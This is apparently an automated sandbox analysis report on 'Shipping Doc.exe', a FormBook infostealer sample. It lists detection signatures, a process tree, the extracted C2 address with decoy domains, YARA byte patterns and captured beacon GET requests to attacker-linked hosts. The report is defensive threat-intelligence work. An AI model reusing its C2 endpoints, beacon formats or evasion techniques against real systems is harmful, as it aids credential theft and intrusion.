Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Shipping Doc.exe

Overview

General Information

Sample Name:Shipping Doc.exe
Analysis ID:458885
MD5:159d560ff64cdb2d130b1635f4123a49
SHA1:5762036dd01f8a63ce29557c5c0464360500c7e6
SHA256:065252f5ed5475c89d2bff7389554a4695a85900a7a75eb98170c6a372b33ea0
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Shipping Doc.exe (PID: 1932 cmdline: 'C:\Users\user\Desktop\Shipping Doc.exe' MD5: 159D560FF64CDB2D130B1635F4123A49)
    • Shipping Doc.exe (PID: 2148 cmdline: C:\Users\user\Desktop\Shipping Doc.exe MD5: 159D560FF64CDB2D130B1635F4123A49)
      • explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 2000 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 3984 cmdline: /c del 'C:\Users\user\Desktop\Shipping Doc.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.shopjempress.com/amb6/"], "decoy": ["segurocars.com", "rylautosales.com", "xinglinjiankang.com", "dantil-brand.com", "sofaloffa.club", "coinclub2.com", "ez-pens.com", "gqtlqsw.com", "robotnewswire.com", "ktproductreviews.com", "merchbrander.com", "yesonamendmentb.com", "losgatoslimos.com", "kristincole.art", "metalmaids.online", "leftcoastmodels.com", "athetheist.com", "jblbusrtingsale.com", "chungcugiarehcm.com", "renblockchain.com", "bigdaddy.fish", "comproliverton.pro", "gzmove.com", "honeythymeherbfarm.com", "davinescosmetics.com", "9355693.com", "movinmemphis901.com", "patriotsrs.net", "dagelijkseschoenen.com", "a-want-ad.site", "theodbox.com", "audioky.net", "hopematthewsrealtor.com", "theonlinemoneymachine.com", "misakiti.com", "ad-yalong.com", "mikealazo.com", "marianoterra.com", "shivorja.com", "goodvibrationswindchimes.com", "pecom-deliverry.online", "amlexcel.com", "emeralddrumcompany.com", "dalipaella.com", "shopcamacci.com", "xucaiwujin.com", "bxs5000.com", "2en1institut.com", "zxzm47-wj.com", "builttek.com", "66400yy.com", "beegraze.com", "thedottedcat.com", "komsah.com", "4202nsacramentoav.info", "88q27.com", "toriengenharia.com", "briscoewelding.com", "brookelenzi.com", "tribaltrash.com", "bidtas.com", "shokhorror.com", "bodurm.com", "333.wiki"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.Shipping Doc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.Shipping Doc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.Shipping Doc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        4.2.Shipping Doc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.Shipping Doc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.shopjempress.com/amb6/"], "decoy": ["segurocars.com", "rylautosales.com", "xinglinjiankang.com", "dantil-brand.com", "sofaloffa.club", "coinclub2.com", "ez-pens.com", "gqtlqsw.com", "robotnewswire.com", "ktproductreviews.com", "merchbrander.com", "yesonamendmentb.com", "losgatoslimos.com", "kristincole.art", "metalmaids.online", "leftcoastmodels.com", "athetheist.com", "jblbusrtingsale.com", "chungcugiarehcm.com", "renblockchain.com", "bigdaddy.fish", "comproliverton.pro", "gzmove.com", "honeythymeherbfarm.com", "davinescosmetics.com", "9355693.com", "movinmemphis901.com", "patriotsrs.net", "dagelijkseschoenen.com", "a-want-ad.site", "theodbox.com", "audioky.net", "hopematthewsrealtor.com", "theonlinemoneymachine.com", "misakiti.com", "ad-yalong.com", "mikealazo.com", "marianoterra.com", "shivorja.com", "goodvibrationswindchimes.com", "pecom-deliverry.online", "amlexcel.com", "emeralddrumcompany.com", "dalipaella.com", "shopcamacci.com", "xucaiwujin.com", "bxs5000.com", "2en1institut.com", "zxzm47-wj.com", "builttek.com", "66400yy.com", "beegraze.com", "thedottedcat.com", "komsah.com", "4202nsacramentoav.info", "88q27.com", "toriengenharia.com", "briscoewelding.com", "brookelenzi.com", "tribaltrash.com", "bidtas.com", "shokhorror.com", "bodurm.com", "333.wiki"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Shipping Doc.exeVirustotal: Detection: 50%Perma Link
          Source: Shipping Doc.exeMetadefender: Detection: 31%Perma Link
          Source: Shipping Doc.exeReversingLabs: Detection: 26%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: Shipping Doc.exeJoe Sandbox ML: detected
          Source: 4.2.Shipping Doc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Shipping Doc.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: Shipping Doc.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cscript.pdbUGP source: Shipping Doc.exe, 00000004.00000002.321211799.0000000003630000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.292742080.000000000EBC0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Shipping Doc.exe, 00000004.00000002.320512631.0000000001960000.00000040.00000001.sdmp, cscript.exe, 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Shipping Doc.exe, 00000004.00000002.320512631.0000000001960000.00000040.00000001.sdmp, cscript.exe
          Source: Binary string: cscript.pdb source: Shipping Doc.exe, 00000004.00000002.321211799.0000000003630000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.292742080.000000000EBC0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.shopjempress.com/amb6/
          Source: global trafficHTTP traffic detected: GET /amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&l8B=RjAhR HTTP/1.1Host: www.bigdaddy.fishConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /amb6/?DPt4=ZduBhxyNf/T8KdukIHnfIOdlFHQuF1EsUtpfZKs5gLBpa2z0TfcmffP3A+e7CMLv2uy0&l8B=RjAhR HTTP/1.1Host: www.davinescosmetics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: DREAMHOST-ASUS DREAMHOST-ASUS
          Source: global trafficHTTP traffic detected: GET /amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&l8B=RjAhR HTTP/1.1Host: www.bigdaddy.fishConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /amb6/?DPt4=ZduBhxyNf/T8KdukIHnfIOdlFHQuF1EsUtpfZKs5gLBpa2z0TfcmffP3A+e7CMLv2uy0&l8B=RjAhR HTTP/1.1Host: www.davinescosmetics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.bigdaddy.fish
          Source: cscript.exe, 0000000F.00000002.483172630.0000000005E2F000.00000004.00000001.sdmpString found in binary or memory: http://BigDaddyUnlimited.com/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC
          Source: explorer.exe, 00000006.00000000.282041503.00000000089C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Shipping Doc.exe, 00000002.00000003.218505402.00000000057C6000.00000004.00000001.sdmp, Shipping Doc.exe, 00000002.00000003.218511303.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
          Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Shipping Doc.exe, 00000002.00000003.219138017.00000000057BE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
          Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Shipping Doc.exe, 00000002.00000003.219469628.0000000005799000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalsdn
          Source: Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcomFU
          Source: Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
          Source: Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comlicd
          Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: Shipping Doc.exe, 00000002.00000003.213525769.000000000579B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comicV
          Source: Shipping Doc.exe, 00000002.00000003.213474844.000000000579B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comny
          Source: Shipping Doc.exe, 00000002.00000003.216206775.0000000005787000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Shipping Doc.exe, 00000002.00000003.216929499.0000000005786000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn&
          Source: Shipping Doc.exe, 00000002.00000003.216788502.0000000005786000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
          Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Shipping Doc.exe, 00000002.00000003.216206775.0000000005787000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn4
          Source: Shipping Doc.exe, 00000002.00000003.216206775.0000000005787000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn8
          Source: Shipping Doc.exe, 00000002.00000003.216929499.0000000005786000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnP
          Source: Shipping Doc.exe, 00000002.00000003.215912066.000000000578E000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnd
          Source: Shipping Doc.exe, 00000002.00000003.215964486.0000000000E0D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cny
          Source: Shipping Doc.exe, 00000002.00000003.215964486.0000000000E0D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnz
          Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Shipping Doc.exe, 00000002.00000003.222324750.0000000005792000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/0
          Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/8
          Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/;
          Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/B
          Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/U
          Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0/
          Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0a
          Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/argeg
          Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/d
          Source: Shipping Doc.exe, 00000002.00000003.218593004.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/en-u
          Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/en-ut
          Source: Shipping Doc.exe, 00000002.00000003.218167835.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/fr-f
          Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/n
          Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/q
          Source: Shipping Doc.exe, 00000002.00000003.218167835.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/siv
          Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/vam&
          Source: Shipping Doc.exe, 00000002.00000003.212987891.0000000005783000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Shipping Doc.exe, 00000002.00000003.212987891.0000000005783000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coma7
          Source: Shipping Doc.exe, 00000002.00000003.212987891.0000000005783000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comiv
          Source: Shipping Doc.exe, 00000002.00000003.218593004.0000000005785000.00000004.00000001.sdmp, Shipping Doc.exe, 00000002.00000003.218511303.0000000005785000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Shipping Doc.exe, 00000002.00000003.218593004.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.comc
          Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Shipping Doc.exe, 00000002.00000003.214716683.000000000579B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comI
          Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
          Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
